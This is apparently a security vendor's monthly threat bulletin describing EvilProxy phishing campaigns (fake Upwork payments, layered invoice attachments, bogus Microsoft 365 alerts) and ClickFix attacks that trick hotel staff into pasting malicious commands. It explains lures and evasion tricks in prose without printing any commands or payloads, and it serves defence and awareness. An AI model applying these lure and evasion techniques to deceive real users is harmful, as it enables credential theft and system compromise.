Email Threat Radar – June 2025, During May, Barracuda threat analysts identified several notable email-based threats targeting organisations around the world and designed to evade detection and boost the chances of success, including:

• The EvilProxy phishing kit resurfacing with new attacks and tactics, such as:
  • Spoofing the Upwork employment platform
  • Sending fake Microsoft 365 security warnings
  • Invoice scam attacks with layered attachments for added deception
• Hospitality-themed phishing attacks using the ClickFix social engineering technique made popular by nation-state threat actors.

EvilProxy resurfaces with new tactics, spoofing a popular employment platform and sending fake Microsoft 365 warnings

Threat Snapshot

EvilProxy, a leading Phishing-as-a-Service (PhaaS) provider that was prolific in early 2025, has resurfaced with a range of innovative tactics designed to trick users into clicking on links and sharing credentials. The first of these is a wave of phishing attacks spoofing the trusted Upwork employment platform to send fake payment notifications.

Impersonating the Upwork Freelance Platform

The attacks begin with a legitimate-looking email that claims to notify the freelancer that they’ve been paid for recent work. For added credibility, the email pretends to come from a trusted Upwork customer.

There is a link in the body of the email inviting the recipient to view the details of the payment.

This link directs them to a ShareFile page where they are presented with another link.

If the target clicks this link, they are taken to a “verification” page to “prove” they are not a bot. This extra step is intended to make the process seem more legitimate and encourage the victim to continue.

The victim is then redirected to a fake login screen designed to steal their Microsoft login credentials, giving the attackers access to their personal accounts and sensitive data.

A New Twist On the Standard ‘Invoice Scam’ Involving Layered Attachments

Another set of EvilProxy attacks investigated by Barracuda threat analysts last month were invoice scams that led victims through multiple attachments, each one taking them further away from protection.

These attacks begin with a message that looks like a legitimate payment confirmation and includes a .msg attachment. The .msg attachment claims to be a remittance note and includes an embedded image that is disguised as a PDF attachment. When the unsuspecting user clicks on the image, they are redirected via a malicious link to a Cloudflare Turnstile verification page.

The Turnstile verification makes it harder for automated security tools to spot the EvilProxy phishing site that the user is directed to after passing the Turnstile verification. The phishing page is designed to steal the victim’s login credentials.

Fake Microsoft 365 Security Alerts

The threat analysts also found EvilProxy sending phishing emails disguised as Microsoft 365 login alerts. These alerts pretend to come from known and trusted security vendors.

In the campaign seen by Barracuda threat analysts, the attackers sent a range of emails with consistent body copy but three different subject lines. This tactic is often used by scammers to enable attacks to continue after security tools have spotted and blocked one of the subject lines.

The email warns recipients that they urgently need to block a particular IP address that is trying repeatedly to login to their account — a common tactic to create a sense of urgency and the need for prompt action.

The email carries an embedded link that users need to click to block the IP. This link takes them to a fake Microsoft login page, designed to steal their login credentials.

Scammers Trick Users Into Attacking Themselves Using the ClickFix Technique

Threat Snapshot

ClickFix is a social engineering tactic popular with nation-state threat actors and now phishing gangs. It involves tricking victims into thinking there’s a problem with something they’re trying to do. There’s an error message or prompt that tells users they can fix the issue by copy-pasting some commands into a Windows dialog box. These commands enable the attackers to execute malicious commands on the victim’s computer.

ClickFix phishing scams don’t require the targets to open infected documents or click on malicious links. They rely on duping users into adding malicious commands themselves, and this makes such attacks harder for automated security systems to spot.

Recent examples seen by Barracuda mirror those seen elsewhere, targeting organisations in the hospitality sector pretending to be someone called “David” who had booked a hotel room via Booking.com but never received confirmation.

The emails use emotive language to ask the recipient to click on a link to verify the reservation before the customer loses money. To make the email feel even more authentic, it includes the “Sent from iPhone” signature.

Barracuda threat analysts have investigated two variants of the attack.

In the first variant, when users click the link, they’re taken to a page that looks like a standard “I’m not a robot” verification.

They are asked to follow a few simple instructions: press the Windows key + R, then Ctrl + V to paste a command, and press Enter. There’s a cleverly placed “Verify” button that silently copies a malicious command to the victim’s clipboard. When users follow the steps as instructed, they unknowingly execute that command. This downloads and silently runs malware in the background, giving attackers access to the victim’s system without any obvious signs of compromises.

Among other things, the attackers install malicious scripts that can steal sensitive information or install additional malware.

In the second variant of the attack, there’s no “Verify” button. Instead, the page displays a simple checkbox like a typical CAPTCHA. When users click the checkbox, it shows a brief loading animation, making it seem like an authentic verification process. However, behind the scenes, the page silently copies a malicious command to the user’s clipboard without their knowledge.

The command uses a built-in Windows tool that runs an HTML Applications file (HTA). While legitimate in purpose, such files are often exploited by attackers to run malicious scripts. In the incidents seen by Barracuda, these files connect to a URL, which likely contains a harmful HTA file or script designed to execute code on the victim’s system.

In both cases, the attackers’ goal is to deliver and run malicious code with minimal user interaction, using trusted Windows components to bypass security software and silently compromise the system.